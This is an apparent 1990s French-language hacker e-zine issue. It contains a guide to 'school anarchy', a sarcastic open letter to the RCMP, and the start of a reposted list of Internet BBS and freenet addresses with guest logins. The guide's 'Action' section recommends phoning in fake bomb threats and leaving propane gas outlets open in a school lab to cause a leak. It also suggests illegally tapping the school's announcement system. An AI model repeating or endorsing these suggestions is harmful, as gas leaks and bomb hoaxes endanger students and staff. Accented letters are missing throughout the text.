votre mission aprs votre dpart, si ils sont plus jeunes que
vous.
2) Modifier les mcaniques dficientes de notre prsent systme
d'ducation en utilisant les moyens qu'il faut pour que a bouge
(c.a.d. la manire forte, s'il le faut) afin d'amliorer le
systme.
3) Avoir du fun. La priode scolaire est pour plusieurs une
priode plate de la vie (bien que vos parents vous diront le
contraire, mais pensez
toutes les autres conneries qu'ils vous
ont dit et vous devriez pouvoir comprendre que, si ils ont choisi
une job qu'ils n'aimaient pas, c'est leur problme et que vous,
vous tes
l'cole pis que non, c'est pas ncessairement le bon
temps). Le but de ce manuel est aussi de montrer aux lecteurs
qu'il y a autre chose qu'une belle fille dans vos cours pour vous
faire apprcier un peu l'cole (quoique a reste une raison
valide ;).
La Base de l'Anarchie Scolaire:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mike coute du Mettalica et est du type pouilleux. Durant
la rcration, il s'infiltre dans le local d'informatique et vide
une bouteille d'acide sulfurique dans le boitier d'un IBM. Il
repart avec le sentiment du devoir accompli, et va s'en vanter
sa gang de bums.
Rsultat: Rien. Une facture de plus que vos parents
payeront en sacrant. Scrapper pour scrapper, c'est pas de
l'anarchie. Porter un bummer pis des Doc. Martens c'est pas de
l'anarchie. couter du gros Death Metal c'est pas de l'anarchie.
C'est du fucking conformisme, et vous le savez tous.
Pour faire de quoi de [0ol (comme l'criraient une bonne
bunch de lamers)
votre cole, a prend de l'organisation. Une
sorte de petite pgre, en fait. Pas pour avoir le monopole de
l'anarchie (c'est contraire au sens mme de l'anarchie, pardi!),
mais uniquement et seulement pour contribuer
son dveloppement.
Et voici comment...
Comment transformer sa porcherie scolaire en cole de Pense
Libre
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~
et Anarchique (tapes et exemples):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
O P A L (C'est pas ma faute ;)
r r c i
g o t a
a p i i
n a o s
i g n o
s a n
a n
t d
i e
o
n
O) Organisation:
~~~~~~~~~~~~~~~~~
Je l'ai dit prcdemment, et je le rpte. Si vous
connaissez dj
des personnes qui sont prtes
vous aider dans
votre projet (des pirates, des grungers, n'importe qui sachant
diffrencier un thorme d'une pense logique fera l'affaire
(n'acceptez pas les faux bums!)), votre tche n'en sera que plus
facile. Sinon, peut-tre connaissez-vous quelqu'un d'un peu plus
bright que la moyenne, qui sera capable d'accepter vos ides et
de les supporter, ou au moins d'y rflechir. Vous pouvez
commencer seul, bien sr, mais prparez-vous
de LOOOONGUES
soires de travail acharn (la rcompense en vaut la peine, faut
dire). L'important, dans le monde que vous slectionerez, c'est
de choisir du monde responsable. Choisissez quelqu'un qui peut
faire ce que vous demandez, et surtout qui peut le faire pour
QUAND vous le demandez (je ne parle pas ici d'un mulet de
service. Il ne vous obira pas au doigt et
l'oeil, s'il n'est
pas stupide. Faites-le travailler, mais pour l'amour de "Dieu",
ne le faites pas travailler si VOUS ne travaillez pas!).
L'irresponsabilit mnera votre entreprise droit
la faillite.
Vous pourrez vous permettre d'engager quelques anars
traine-la-patte lorsque votre organisation aura au moins
suffisemment de membres pour soutenir des projets et des
venements de manire rgulire.
P) Propagande:
~~~~~~~~~~~~~~
La majorit du travail et des frustrations s'effectue ici,
mais une bonne partie du plaisir aussi. Premirement, si vous
tes du genre poseur ou show-off, lchez votre organisation
immdiatement. PERSONNE ne doit savoir que vous tes dans
l'organisation, mme pas votre petite-amie, mme pas votre
meilleur ami (sauf s'il est dj
dans l'organisation ;), et cela
pour des raisons bien simples: les filles ont gnralement une
grande gueule, et les gars... ont gnralement une grande gueule
aussi (liminons le sexisme ds aujourd'hui ;). Voici le genre de
schma qui arrive quand on parle de son organisation
une
personne oh-combien "de confiance"
Membre de l'organisation --> Petite-Amie --> Amie de la
petite-amie --> Amie de l'amie --> Amie de l'amie de l'amie (qui
est la cousine de la fille du concierge) --> Fille du concierge
--> Concierge (qui a vent de l'affaire en coutant sa fille
parler avec son chum au tlphone) --> Directeur --> Membre de
l'organisation.
Vous comprenez pourquoi je dis qu'il faut fermer sa gueule?
Bon, il y a deux grandes manires de faire la propagande
(dans ce cas) et il est important de savoir laquelle utiliser
avant de le faire.
1) Le Groupe Et L'Anarchie: Vous donnez un nom
votre petite
faction rebelle, et librez tout sous ce nom. Vous avez des
moyens d'inscription (VMB, par exemple) et vous recrutez des
membres.
2) L'Anarchie Sans Le Groupe: Pas de nom. Si vous placardez des
affiches, par exemple, vous crirez dessus "Vive l'Anarchie"
la
place de "Joignez les rangs de <nom du groupe> et supportez
l'Anarchie".
Maintenant, voici le plus important: Les mediums de
propagande, ou comment faire pour faire parvenir l'information o
elle doit parvenir:
a) Les Affiches et Graffitis: Forme d'art et de communication,
les posters et graffitis seront en mesure de faire passer le
message de manire claire, mais pour un court laps de temps, par
contre (le temps qu'un minable arrache l'affiche). L'avantage
principal est que tout le monde qui voit l'affiche va la lire car
c'est court, contrairement
, par exemple, un magazine.
b) Le Magazine: Tiens, parlons-en. Que vous publiez les
back-issues d'NpC, d'un autre journal underground en francais
(TRES important) ou votre propre priodique anarchique, le
magazine est une EXCELLENTE facon de faire vhiculer
l'information. Vous pouvez en dire beaucoup plus dans un magazine
que dans une affiche, et le message va durer plus longtemps (les
magazines vont se conserver, le monde va se les prter, etc).
Vous atteignez donc,
moyen terme, pas mal de monde si votre
journal a de la gueule. N'oubliez pas d'crire pour le public le
plus large possible, c'est la cl! Si vous crivez en prose pour
l'lite intellectuelle de votre cole, vous n'aurez pas grands
membres. Mme les stupides peuvent tre anars, n'oubliez pas!
Dsavantage du magazine: son cot, et le temps que a prend
le
prparer (si c'est une publication indpendante, ce qui est
toujours plus marrant). Si vous avez accs
une photocopieuse
gratuitement, bingo, un beau magazine for nothing! Ah oui,
dernier conseil, en ce qui concerne quelque chose de trs
important: LE TITRE. Choisissez un titre accrocheur, ne le
changez JAMAIS, et surtout, le titre doit tre ABSOLUMENT en
franais. C'est ben cute Phree Rebel Press, mais lorsque les
tudiants vont regarder a de loin, leur raction va tre: NAH!
Vous devrez utiliser votre imagination pour ce qui est de
la distribution du magazine. Voici quelques exemples:
- Laissez une pile sur le dessus d'une toilette. Tout ceux
qui iront aux toilettes aprs vous s'en prendront une copie
(l'criture anarchique peut tre laxative, dit-on).
- Laissez une pile
chaque bloc de cases,
terre. a peut
toujours marcher.
- Si les cases le permettent, glissez des exemplaires
directement dans des cases. Vous pourriez mme commencer un
service de distribution
chacun des abonns, pour une somme
modique (ou gratuit, mme!). Si vous faites cela, ammanchez-vous
pour que le magazine soit broch.
Si les habitants de la case voient une pile de feuilles,
ils vont probablement la crisser aux vidanges.
- La prochaine mthode, vous devez au moins la faire une fois
dans votre vie, bien qu'elle soit un peu plus complique et
demande pas mal plus de guts (mais encore). Voici le matriel
ncessaire:
o Un pote qui a une voiture
o Un set de linge (tout au complet, mme souliers) et une
cagoule.
o De la rputation (il faut que pas mal tout le monde
connaisse le journal rebelle)
o Une **GROSSE** pile de votre publication. Au moins, GROS
MINIMUM, 100 copies.
o Un porte-voix (facultatif)
Bon, tout se passe sur l'heure du dner, pendant que les
tudiants bouffent
la cafteria. Votre pote gare sa voiture
devant la sortie la plus proche de la caf. Vous allez aux
chiottes, changez de vtements, passez la cagoule, mettez la pile
dessous vos bras et le porte-voix dans l'autre main (si vous en
avez un). Sortez des chiottes, faites un petit jogging jusqu'
la
cafteria, sautez sur la table de la premire range, mais au
milieu de la cafteria (si vous voyez ce que je veux dire.. Quoi?
Un Ascii? OUAIS! ;)...
______________________________________________
--------------------------------------------+|
||
+---+ +---+ +---+ +---+ +---+ ||
| | | | | | | | | | ||
| | | | | | | | | | ||
+---+ +---+ +---+ +---+ +---+ ||
+---+ +---+ +---+ +---+ +---+ ||
| | | | | | | | | | ||
| | | | | | | | | B <------+------- Vous montez ici.
+---+ +---+ +---+ +---+ +---+ \ ||
+---+ +---+ +---+ +---+ +---+ \ ||
| | | | | | | | | | \ ||
| | | | | | | | | | | ||
+---+ +---+ +---+ +---+ +---+ | ||
\ | /||
____________________________________\ A /_+
------------------------------------ ^----- Vous entrez ici.
... Et au milieu de la cafteria, vous criez dans
votre porte-voix: "Vive la pense libre! Vive <nom du
magasine>!". Foutez la pile de magazines sur la table et sacrez
votre camp au galop jusqu'
la bagnole. A partir de l
, vous
allez
un endroit o vous pouvez vous changer, et vous revenez
l'cole, mine de rien (comme Superman, finalement ;-). Si vous
n'avez pas pris la porte principale (vous ne devriez pas), pas
grand monde ne devrait pouvoir reconnatre la voiture.
De toute facon ce genre de problme est mineur, surtout
quand vous avez la population tudiante de votre ct. ATTENTION!
Si vous faites ce truc avant que le magazine/groupe ne soit
connu, personne (ou presque) n'osera ramasser ce journal. Par
compte, si vous avez une rputation de qualit et que pas mal
tout le monde vous aime, a va se garrocher sur les magazines
comme des petits pains chauds.
Et l'exprience vaut son pesant de cacahutes en trill, y'a
pas
dire!
c) Le Televox: Un crack de l'lectronique russira facilement
se ploguer dans le rseau de Televox, soit directement sur un
fil, soit en utilisant illgalement un des tlphones du
secrtariat (la plupart du temps, la secrtaire parle dans un
tlphone).
En utilisant cette mthode, vous atteignez
L'ENSEMBLE de la population tudiante. Pas mal! Ammanchez-vous
pour modifier votre voix (pas dur, pas dur), et dites votre
message AVANT de faire jouer, jusqu'
ce que le tape soit repr,
des extraits de la musique la plus impure (moi, si je le ferais,
je mettrais une bonne toune de Ministry).
d) Projections: Enregistrez avec une mini-camra un petit film
de propagande, et substituez la cassette pour celle que votre
prof. de Biologie va faire jouer. Ractions garanties. Mme si
vous n'atteignez que 30 personnes, l'cole EN ENTIER va en
entendre parler, n'oubliez pas a!
Collez un poster de votre groupe sur l'cran de
projection d'actates (celui qui s'enroule) de vos classes. Un
classique du genre: Une fille nue qui dit dans une bulle: "J'aime
<nom du groupe/magazine>".
e) Livres: Allez
la bibliothque avec une pile de petites
fiches sur lesquelles sont inscrits un des divers slogans de
votre groupe (ou ce que vous avez
dire). Insrez une fiche dans
les romans "Best-Sellers" de votre cole (Agatha Christie,
Collections Frissons, Stephen King est un must). Succs garanti!
N'oubliez pas de faire la mme chose dans vos manuels d'cole
(pas ceux que vous gardez sur vous! Ceux qui se passent d'lves
en lves
longueur d'anne!).
f) Radio-tudiante: Un autre must. Ammanchez-vous pour avoir un
contact dans le staff de la radio ou bien donnez-leur une
cassette en prtextant que c'est tel groupe
faire passer en
demande spciale (tout en sachant trs bien que c'est un
symposium des ides de votre mouvement).
g) Autres: Ah mon Dieu, tant de choses restent
imaginer ;]
A) Action:
~~~~~~~~~~
Vous avez beau faire de la propagande, si votre groupe ne
s'affirme pas en faisant de quoi de concret, tout peut chier, et
vous disparatrez dans la brume. La propagande peut causer par
elle-mme quelques actions (poursuites, qui sait?), mais il faut
en organiser de votre bord si vous voulez que les choses bougent.
Voici quelques exemples. Naturellement, tout dpend de la
cause que vous voulez gagner, mais ces exemples fonctionneront
dans la plupart des tablissements. La plupart sont tirs du
83SCHOOL.TXT, une bonne rfrence en la matire (quoiqu'un peu
trop ax sur l'Anarchie non-constructive, selon moi).
a) Ouvrez un service d'information pour laisser les tudiants
donner leur opinion sur tel professeur ou administrateur, et
remettez les rsulats au directeur d'unit. Rsultats garantis!
;]
b) Organisez une rvolution gnrale contre les lois de port de
vtements. Tout le monde doit avoir au moins une drogation au
code. Plein de plaisir en perspective ;]
c) Votre bouffe de cafteria gote la merde (Bien sur que oui,
voyons donc)? Ammanchez-vous pour que TOUT LE MONDE apporte son
lunch pendant une semaine (ou moins, si impossible), et
revendiquez, au nom des tudiants, de la meilleure bouffe. Si a
ne marche pas, organisez avec tout le monde une bonne vieille
food war ;]
d) Une fausse alerte
la bombe, quoi de mieux pour se payer un
petit cong d'un aprs-midi? Suffit d'avoir 25 cents et une paire
de gants, pensez-y!
e) Durant l'heure du dner, laissez ouvertes les sorties de gaz
propane dans le local de Science Physique. Une fuite de gaz
devrait suffire
fermer l'cole.
f) Demandez
votre bibliothque de s'abonner
un bon magazine
underground (2600, Mondo 2000, TAP) et insistez sur le fait qu'il
devrait tre disponible aux tudiants.
g) Gardez vos cahiers d'exercices et recherches et balancez tout
a aux flots qui prennent votre place.
h) Ah, laissons l'imagination faire son oeuvre... ;]
Liaison:
~~~~~~~~
Pas compliqu: TOUT DOIT SE LIER. La propagande doit tre
lie
votre groupe ou
votre magazine, et votre magazine doit
tre li
votre groupe.
Le groupe DOIT continuer
exister aprs votre dpart, alors
dsignez des sucesseurs, et ne crachez pas sur les plus jeunes.
La propagande arrivera idalement
un point tel o,
chaque
fois qu'il se passe quelque chose de weird dans l'cole, on mette
a sur le dos du groupe. C'est ce que j'appelle 'rcolter sans
avoir sem', et c'est trs plaisant, croyez-moi.
-- --- -- ---
Conclusion:
~~~~~~~~~~~
Allez, bande de criminels. Finissez de lire NpC #10 et
fondez ds maintenant votre petite faction d'Anarchistes
Scolaires, c'est trop plaisant! Si vous avez des questions,
commentaires ou whatever, laissez-moi un private sur Sietch,
InfernO ou WorkShop, je trouverai la rponse.
N'oubliez pas:
... ANARKEE CAN BE CONSTRUCTIVE!
(And it's the goal of it, indeed)
Lates..
l0gRuS!
[NpC
Collaborator]
--------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
--------------------------------------------------------------
UNE AUTRE LETTRE A LA Gendarmerie Royale du Canada
ou
Descendez de vos grands chevaux! (Mounties, chevaux, get it? ;-)
par Blitzkreig
Ma gang de polissons! ...'Scusez, mais je suis un peu fch
contre vous.
Un tantinet.
Juste un petit peu.
Un soupon de dception.
J'ai reu, il y a deux semaines environ, quelques coups de
tlphone de "pirates" de la rgion de Qubec, gnralement
dignes de foi, qui m'assuraient que la GRC (ou du monde li
...)
les avaient contact (pour nos lecteurs: c'est une trop longue
histoire pour que j'entre dans les dtails, mais les coches
savent de quoi je parle) et leur avaient conseill "d'viter
toute frquentation avec le dnomm Blitzkreig". Certains ont eu
l'audace de demander si NPC allait se faire fermer. Et vous de
rpondre: "On ne peut rien contre le magazine (je vois que vous
avez appris votre leon!), c'est pourquoi on va bientt arrter
Blitzkreig pour fraude
son travail"...
O allez-vous chercher des excuses aussi nulles? Un: je n'ai
jamais, en 16 ans de carrire, fraud
mon travail, et deux:
mme si je chipait un stylo de temps
autre, a ne serait
toujours pas du ressort de la GRC. Vous allez tre obligs de
trouver une autre excuse moins lame pour tenter de faire de la
dsinformation et d'loigner les amis de NPC. Ou pour tenter, en
faisant couler cette information, de m'inquiter.
A moins que...
A moins que ayant senti, bons observateurs que vous tes,
que j'avais de la difficult
n'tre Blitzkreig qu'
temps
partiel, vous avez dcid de me donner un coup de main. Vous avez
devin que la tche d'tre un honnte citoyen durant le jour et
un rebelle informatique durant le soir et les fins de semaine
tait trop lourde pour moi. Et vous supposez (avec raison) que je
suis trop lche pour choisir entre l'une et l'autre carrire, au
profit de celle qui m'apporte le plus de satisfaction. Vous
voulez me donner un coup de pouce dans la bonne direction, vous
voulez me faire perdre ma job pour me donner l'occasion d'tre
Blitzkreig A PLEIN TEMPS! Et moi qui, innocemment, croyait que
vous aviez dj
assez de misre avec moi...
Si c'est le cas, sachez que je vous en remercie! Mille fois!
Chaleureusement! Du fond du coeur! Y! Blitzkreig
plein temps:
pouvoir travailler
plein temps sur le magazine afin dans faire
un document d'une qualit insurpassable. Et, pourquoi pas, avoir
enfin le temps de faire les dmarches pour le sortir en imprim,
et rejoindre ainsi plus de gens encore!
Mieux encore: vous savez que Blitzkreig chmeur ne
demeurerait pas trs longtemps sur les programmes sociaux comme
l'assurance-chmage et le b.s. Vous savez que Blitzkreig
-plein-
temps se dbrouillerait rapidement pour monnayer ses
connaissances. Ainsi, je pourrais, par exemple, faire le tour de
toutes les organisations criminelles et clubs de motards de la
province, ainsi que les Warriors, et offrir mes services
titre
de consultant, afin de les aider
btir des rseaux
informatiques scuritaires et confidentiels. Je pourrais aider
tous les bandits de la province (et pourquoi s'arrter l
!)
devenir des criminels du XXIme sicle! Dites donc, messieurs de
la GRC, vous aimez le dfi, vous!
Ah! Que de belles perspectives d'avenir! Mais, je vous
prviens, il y a malheureusement un hic dans votre plan. Par ma
faute (oui! je l'avoue, je ne suis pas trs coopratif!), vous
allez avoir de la misre
me faire perdre ma job, entre autres
parce que je suis blanc comme neige. Il va falloir que vous y
mettiez le paquet, les mecs, et que vous me colliez quelque chose
de gros (et de compltement fabriqu) sur le dos. Mais n'en
mettez pas trop: en effet, si, par exemple, vous cachiez un kilo
de coke dans mon bureau, ce n'est pas au chmage que je me
ramasserais, mais en prison. Ca viendrait contrecarrer nos plans,
a. A moins que...
A moins que (encore!) vous n'ayez, dans votre grande
mansutude, imagin un autre plan de carrire pour moi. Je vois
a d'ici: Blitzkreig qui se ramasse dans un pnitencier, entour
de 1500 dtenus analphabtes et incultes. Dans votre plan (que
j'approuve compltement), vous dsirez que, en l'espace de
quelques mois, je transforme ces 1500 dtenus captifs et
rceptifs
mon enseignement, en 1500 hackers de premire force!
H! C'est bien pens! Tu mets un hacker en prison, et 1500 en
ressortent. Quel plan!
Mais il y a encore quelque chose qui me chicotte dans vos
actions, messieurs de la GRC: comment tre sr que votre plan
russisse? Comment tre sr que vous allez gagner votre procs? A
moins que...
A moins que (a commence
bien faire!) vous ayez dcid de
donner un coup de main financier
NPC! En effet, l'instauration
de LLC et la parution de NPC en imprim cote des sous, que nous
n'avons pas, pour le moment. Qu'
cela ne tienne: la GRC va
entamer une poursuite contre Blitzkreig, avec de fausses preuves
qui ne tiendront pas longtemps devant un jury (pourquoi faut-il
qu'il y ait la notion de "doute raisonnable"?). Blitzkreig, lav
de tout soupon, va poursuivre la GRC pour atteinte
la
rputation, et va gagner un rglement hors-cour de $500 000
dollars (si vous aviez un plus gros montant dans l'ide, ne vous
gnez pas pour me le faire savoir!). Avec cet argent, nous allons
pouvoir VRAIMENT mettre le piratage
la porte de TOUS les
citoyens qui ont le coeur
a! Quelle bonne ide! Messieurs de
la GRC, soyez bnis, vous et vos descendants, jusqu'
la
quinzime gnration! Sans vous, qui sait, nous serions peut-tre
disparus dans l'indiffrence la plus totale!
Si c'est quelque chose comme les suggestions prcdentes que
vous aviez en tte, je puis vous assurer que vous avez mon
entire collaboration. Si par contre, toute cette histoire
d'arrestation
mon lieu de travail n'avait pour but que de me
faire peur... Ben, dsol, vous me dcevez. Vous me dcevez parce
que j'tais prt
faire face
la musique, et parce que vous
m'avez, une fois de plus, mal jug. Blitzkreig, en allemand, ne
signifie pas "retraite rapide"...
Dans la vie, tout se termine avec des chansons, dit-on. Dans
NPC, tout se termine avec une coupure de journal... Regardez ce
que j'ai trouv!
Leeched from LA TERRE DE CHEZ NOUS - 23 septembre 1993
STAGNATION DANS LE DINDON
par Rnald Bourgeois
La demande de dindon ne suit pas la mme tendance que pour
le poulet
griller. (...) La table filire avicole qubcoise
s'est penche sur les moyens
mettre de l'avant pour augmenter
la consommation du dindon. Elle a identifi le dveloppement de
nouveaux produits, la promotion, l'tude des besoins des
consommateurs, la concertation des intervenants, comme
principales actions
entreprendre. La structure de prix, les
techniques de mise en march, la capacit d'abattage et le
dclassement seront galement analyss par les divers
intervenants dans le but d'amliorer la productivit, de diminuer
les cots, d'uniformiser la qualit. On espre ainsi amliorer
l'image du dindon auprs de (...) la population en gnral.
- 30 -
Vous ne voyez pas la relation entre un article tir d'une
revue agricole et l'affaire qui nous occupe? Vraiment pas? Voyez-
vous, c'est pour a que vous tes la GRC et que nous sommes
NPC...
By the way, THX 1138 parle encore de vous dans sa chronique
BONJOUR LA POLICE! Tut-tut-tut-tut-tut...
----------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
----------------------------------------------------------------
Services disponibles sur l'Internet, une introduction.
par
Gurney Halleck
Vu le projet mis en branle par notre ami Blitzkreig i.e. une
node internet ici mme
Qubec, plusieurs personnes veulent
srement en savoir plus
propos d'Internet. J'ai donc tent de
compiler une liste de services peu connus sur l'internet. Pendant
mon travail, j'ai trouv un message sur Usenet qui exprimait
exactement ce que je dsirais dire (et beaucoup mieux que je
n'aurais pu le faire moi-mme). Alors j'ai jet mon article aux
poubelles et je vous offre plutt cette liste. Ouvrez grand vos
yeux.
Newsgroups: alt.bbs.internet,alt.bbs.lists
Entries are as follows:
Name of Board 44
TCP address 4 4
IP address 4 4
Login name (password, if necessary) 4 4
Services provided 4 4
0................ CC's Wish List 444444444
0.5.............. Coke Machines on the Internet
1................ Free BBSs on the net
2................ Freenets and Public Access UNIX
3................ For-pay BBSs
4................ Other services and tips
This is a list of services, often made possible by volunteers
who usually go unthanked. If you see anyone who does this sort of
thing, thank them.
Also, whatever you do, DO NOT ATTEMPT TO HACK ANYTHING ON THE
INTERNET! The hacking that has been done on the Internet has
caused a great many BBSs and other sites to go down forever, and
others have taken steps at making this net a little less friendly
than it is now. (e.g., Nyx.) These BBSs do not have to be here.
However, they still exist and literally thousands use them each
day. Don't hack them, or what we now have will be history. Well,
that said, on with the show...
[Encore quelqu'un qui melange hacker et crasher...]
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
CC's WISH LIST
///////////////////////////////////////////////////////////
-An encyclopedia. There are dozens of encyclopediae (is that
right? My Latin is a little rusty. :) on CD-ROM, and just one
would do a world of good for college students.
Anyone with wishes for the Internet, feel free to mail me.
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
COKE MACHINES ON THE INTERNET
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
The latest in hacker trends. :) Actually, they've been around for
a little while now... These are actual Coke and M'n'M machines
connected to the Internet, and when fingered, provide you with
the amount of soft drinks held within. I doubt you could hack
'em, anyway... and if you could, how would you get the product?
:) These are just interesting, so I put them in. Enjoy.
drink@csh.rit.edu
graph@drink.csh.rit.edu
coke@cmu.edu
@coke.elab.cs.cmu.edu
bargraph@coke.elab.cs.cmu.edu
mnm@coke.elab.cs.cmu.edu
coke@cs.wisc.edu
coke@gu.uwa.edu.au
(Special thanks to alt.hackers for the info.)
[Ironique n'est-ce pas? Des machines
liqueur sur l'internet et
ici
Quebec, pas moyen pour une personne d'tre sur l'internet]
///////////////////////////////////////////////////////////
FREE BULLETIN BOARD SERVICES
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
NOTE: I have placed BBSs whose main goal is to entertain or serve
as a forum for people to get together here. BBSs whose primary
purpose is connectivity or services involving the INet have been
placed in 'Other Services and Tips'.
\\\EBBS/PIRATE BBS///
Friendlier than it sounds. Takes advantage of VT100 and up with a
full-screen environment. All offer Boards (message areas), Mail,
and Talk. Some offer Files and IRC connections.
Auggie BBS
bbs.augsburg.edu
141.224.128.3
bbs
Friendly BBS. Lots of chatting on various topics, file areas, and
IRC-like and realtime chat facilities. Now has 4m, a new chat
network. Try it out.
Eagles' Nest BBS
seabass.st.usm.edu
131.95.127.2
bbs (bbs)
Ask around for cute stories. :)
SCF BBS
freedom.nmsu.edu
128.123.1.14
bbs
Uninet BBS
uninet.mty.itesm.mx
131.178.51.42
bbs
uninet
Specializing in ecology/the environment, in Spanish.
SPARCS BBS
ara.kaist.ac.kr
143.218.1.53
bbs
KIDS BBS
kids.kotel.co.kr
147.6.11.151
kids
Badboy's Inn
badboy.aue.com
192.136.108.18
bbs
ICU BBS
amiga.physik.unizh.ch
130.60.80.80
bbs
Switzerland. Achtung! Almost entirely in German...
Razor BBS
netrats.dayton.saic.com
139.121.26.235
bbs
NSYSU-BBS
cc.nsysu.edu.tw
140.117.11.1
bbs
Taiwanese. Don't let the strange characters fool you. :)
\\\CITADEL///
Citadel is a message-only system. Boards using this are highly
active with the exchange of messages in various "rooms",
sometimes as varied as MST3K>, NetLife>, and Spam! Spam! Spam!>.
Plenty of information can be had on these boards, though no files
are available.
Another feature of these boards is that each one has added a
little flavor to the stock Citadel code, so none of them are
quite the same.
Quartz BBS
quartz.rutgers.edu
128.6.60.6
bbs
Citadel
The granddaddy. Interesting and spontaneous conversation found at
any hour of the day or night. That is, if you can get in. :)
Prism BBS
bbs.fdu.edu
132.238.2.10
bbs
Multi-level Citadel. Not as difficult as I had previously
elaborated. :)
Sunset BBS
paladine.hacks.arizona.edu
128.196.230.7
bbs
Another variation of the normal Citadel, somewhere between the
original and DOC.
\\\DOC///
Dave's Own version of Citadel.
Best-known as the software ISCA BBS runs, it is a far more
user-friendly system than the original Citadel. No files can be
had on these, either.
ISCA BBS
bbs.isca.uiowa.edu
128.255.40.203
The biggest BBS on the net. Period. About 10000 active users, and
often more than 300 users online at any given time. Huge areas
for conversation on diverse topics.
SkyNet
hpx6.aid.no
128.39.145.226
skynet
The accepted backup for ISCA, but is quickly coming into its own.
A lot more relaxed, comparatively.
CetysBBS
infux.mxl.cetys.mx
158.122.1.2
cetysbbs
South of the border. A lot of the posts are in Spanish, but
English speakers are easily accommodated...
BBSs USING OTHER SOFTWARE:
OUBBS
oubbs.telecom.uoknor.edu
129.15.3.15
TBBS
A very attractive BBS catering to University of Oklahoma
students. Offers a lot of services typical to non-Net BBSs,
including Internet and FidoNet mail. Both Mac and IBM files
available.
Monochrome
mono.city.ac.uk
138.40.17.1
mono (mono)
Mail monoadm@city.ac.uk for an account.
It's neat. I like it. You get to see lots of English people.
BOX
tolsun.oulu.fi
130.231.96.16
box
Has trouble translating everything to English, but still a good
board all around.
DUBBS
tudrwa.tudelft.nl
130.161.180.68
bbs
BBS in the Netherlands with an almost-WWIV look.
yabbs
phred.pc.cc.cmu.edu
128.2.111.111
bbs
Messages and a few text files. Lots of computing areas.
tiny.computing.csbsju.edu
152.65.165.2
bbs
A graphical BBS, like a hybridization of Pirate and Monochrome.
Try it.
The Endless Forest
forest.unomaha.edu
137.48.1.4
ef
A neat little hangout.
CyberNet
cybernet.cse.fau.edu
131.91.80.79
bbs
Waffle BBS.
[C'est pas beau a? Des sites internet gratuits... mais il faut
tre sur internet pour y accder: un vrai cercle vicieux.]
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
FREENETS AND PUBLIC ACCESS UNIX
///////////////////////////////////////////////////////////
Freenets are fairly new to the Internet. These services often
have Telnet, full email, USA Today news and weather, and are
typically set up like 'cities'. Registration is (as the name
implies) free, but usually require a snail-mailed form. In much
the same idea, a few boards have been set up for the public to
use UNIX at no cost.
Cleveland Freenet
hela.ins.cwru.edu
freenet-in-a.cwru.edu
freenet-in-b.cwru.edu
freenet-in-c.cwru.edu
129.22.8.38
The first Freenet and by far the largest. Lots of features.
Youngstown Freenet
yfn.ysu.edu
192.55.234.27
visitor
National Capital Freenet
freenet.carleton.ca
134.117.1.25
visitor
Victoria Freenet
freenet.victoria.bc.ca
134.87.16.100
guest
Tallahassee Freenet
freenet.scri.fsu.edu
144.174.128.43
visitor
Denver Free-Net
freenet.hsc.colorado.edu
140.226.1.8
visitor
Wellington City-Net
kosmos.wcc.govt.nz
192.54.130.39
Information available from gopher.wcc.govt.nz. You have to apply
for an account, since there is no guest account available.
New Zealand.
M-Net
hermes.merit.edu
m-net.ann-arbor.mi.us
35.1.48.159
35.1.48.160
35.1.48.165
35.1.48.166
35.1.48.149
um-m-net
This was the first Public Access UNIX. Offers email and several
UNIX shells, from novice to expert.
NYX
nyx.cs.du.edu
130.253.192.68
nyx
Full Usenet, UNIX access, and files. Much like a BBS.
///////////////////////////////////////////////////////////
FOR-PAY BBSs
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Internet Direct
indirect.com
192.215.1.62
Phoenix area.
I personally like this interface. An excellent service. $10/month
for dialin access or access from the net, including an email
account, telnet, ftp, and irc, $15/month for full access.
The WELL
well.sf.ca.us
192.132.30.2
San Francisco.
The Whole Earth 'Lectronic Link. Arguably one of the most
interesting places on the Internet. Price is quite steep, at over
$20/month for normal use, but this group is tightly-knit.
Featured just about everywhere they discuss the Net.
Mindvox
phantom.com
38.145.218.228
New York City. $10/month for basic access, $15/mo for FULL
access.
Rumored to be a hangout for the elite. Featured in _Rolling
Stone_.
Well, kinda. :)
The World
world.std.com
192.74.137.5
Boston. Public dial-up internet site since 1989, Usenet, FTP,
Telnet, Clarinet UPI news, IRC, Gopher, Online Book Initiative
(large e-text archive), CPN long-distance access ($5.60/hr, USA).
$5/mo+$2/hr or $20/20 hours.
Eskimo North BBS
eskimo.com
192.195.251.13
MUD on port 3000...
Washington State. Features Usenet, including several readers,
shell access, and files, among other things...
HoloNet
holonet.net
157.151.0.1
holonet
California. Usenet, connectability with MS Mail, cc:Mail and the
like... news, files, FTP and Telnet access, fairly low-cost,
hundreds of access points (i.e., SprintNet).
Telerama
telerama.pgh.pa.us
128.2.55.33
Pittsburgh. Usenet, files, and all that. A typical setup, plus
ClariNet (UPI news and the like) available.
Net Access
netaxs.com
192.204.4.1
Philadelphia. Fairly new, and offering more and more services as
we speak. Already available: FTP, IRC, Telnet, Gopher, email,
MUD/MUSE, and Usenet.
Texas Metronet
feenix.metronet.com
192.245.137.1
info(info) or signup(signup)
Dallas/Fort Worth, Texas. Good interface. Fairly expensive,
though.
Bergen By Byte
oscar.bbb.no
192.124.156.13
Norwegian for-pay BBS.
Email and all the typical features.
Cost is 400 NK for non-students, half that for students.
(Exchange rate works out to AM$25-30 for students.)
///////////////////////////////////////////////////////////
OTHER SERVICES AND TIPS
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Grind
grind.isca.uiowa.edu
